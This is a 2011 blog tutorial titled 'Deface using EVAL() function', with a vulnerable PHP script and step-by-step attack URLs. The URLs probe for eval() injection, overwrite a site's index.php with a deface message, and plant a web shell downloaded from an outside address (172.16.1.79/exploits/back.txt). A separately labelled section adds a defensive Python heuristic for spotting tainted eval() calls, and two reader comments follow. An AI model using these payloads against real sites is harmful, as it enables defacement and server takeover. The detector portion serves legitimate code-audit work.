Saturday, 5 March 2011

Deface using EVAL() function



"eval() is a PHP function that allows a given string to be interpreted as PHP code. Because eval() is often used in Web applications, although interpretation of the string is widely manipulated, eval() serves most of the time to execute PHP code containing a previously defined variable.
The problem is that if eval() executes a variable that you can modify, the PHP code it contains will be executed by eval() as such. Reminder: eval() allows execution of a given string as PHP code but does not write its content (unless so desired) to this page or others; it is content to execute it and display the result."

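OK, this is our vulnerable page:

<?php
// 'ev' comes straight from the query string (attacker-controlled)
$Ev = $_GET['ev'];
// stripslashes() only removes backslash escaping; it is not a sanitizer
$eva = stripslashes($Ev);
// the request data is executed as PHP code
eval($eva);
?>

Now let's go to the interesting part. To start, we need to test whether the page is vulnerable by requesting this URL:
http://mytargettest.com/hacktest/index.php?ev=phpinfo();
If the phpinfo page is displayed, the server executed code supplied in the query string, which means we can exploit it.
Now let's see what we can do.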
1) You can just deface index.php using this URL: http://mytargettest.com/hacktest/index.php?ev=$z=fopen("index.php",'w');fwrite($z,("Defaced by Hacker"));fclose($z);

2) Or you can create your shell with this URL: http://mytargettest.com/hacktest/index.php?ev=$z=fopen("shell.php",'w');fwrite($z,file_get_contents("http://172.16.1.79/exploits/back.txt"));fclose($z);

3) Browse to your shell: http://mytargettest.com/hacktest/shell.php
Now just look at my old posts (LFI or RFI) and you will know what to do from this point ;)
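
As an added example (not code from the original post), here is a defender-side source audit for the pattern in the vulnerable page above: a small Python heuristic that flags eval() calls whose argument traces back to a request superglobal, including through intermediate variables and wrappers such as stripslashes() that a plain search for eval($_GET would miss. The function name find_tainted_eval and the sample input are constructed for illustration.

```python
import re

# Request-controlled PHP superglobals treated as taint sources.
SOURCE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b")
VAR = re.compile(r"\$[A-Za-z_]\w*")
# "$name = expr;" or "$name .= expr;" (but not == or =>)
ASSIGN = re.compile(r"(\$[A-Za-z_]\w*)\s*(\.?)=(?![=>])\s*([^;]*);")
# "eval(expr);" but not $eval(, ->eval(, ::eval( or names ending in "eval"
EVAL = re.compile(r"(?<![\w$>:])eval\s*\(([^;]*)\)\s*;", re.IGNORECASE)

# Constructed sample: the page's vulnerable script plus a constant eval().
SAMPLE = """<?php
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);
eval($eva);
$fixed = 'echo 1;';
eval($fixed);
?>"""


def find_tainted_eval(php_source):
    """Return [(line_number, argument)] for eval() calls fed by request data.

    Heuristic pass in source order, ignoring branches: a variable is tainted
    when assigned from a superglobal or a tainted variable, and cleared when
    overwritten with anything else. Wrappers such as stripslashes() are
    deliberately not treated as sanitizers.
    """
    tainted, findings = set(), []

    def is_tainted(expr):
        return bool(SOURCE.search(expr)) or any(v in tainted for v in VAR.findall(expr))

    events = [(m.start(), "assign", m) for m in ASSIGN.finditer(php_source)]
    events += [(m.start(), "eval", m) for m in EVAL.finditer(php_source)]
    for pos, kind, m in sorted(events, key=lambda e: e[0]):
        if kind == "assign":
            name, append, expr = m.groups()
            if is_tainted(expr) or (append and name in tainted):
                tainted.add(name)
            else:
                tainted.discard(name)
        elif is_tainted(m.group(1)):
            findings.append((php_source.count("\n", 0, pos) + 1, m.group(1).strip()))
    return findings


if __name__ == "__main__":
    for line, arg in find_tainted_eval(SAMPLE):
        print(f"line {line}: eval() receives request-derived data: {arg}")
```

On the sample it reports only the eval() on line 4; the constant eval($fixed) is left alone. Every hit should be reviewed by hand, since the pass is regex-based and does not understand PHP strings or control flow.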

2 comments:

  1. Very nice tutorial.
    The question is how do we know if the website parses a variable using eval() in the PHP script?
    How do we test for the eval() vuln?

    Thank you :)

  2. By using a Web Vulnerability Scanner.
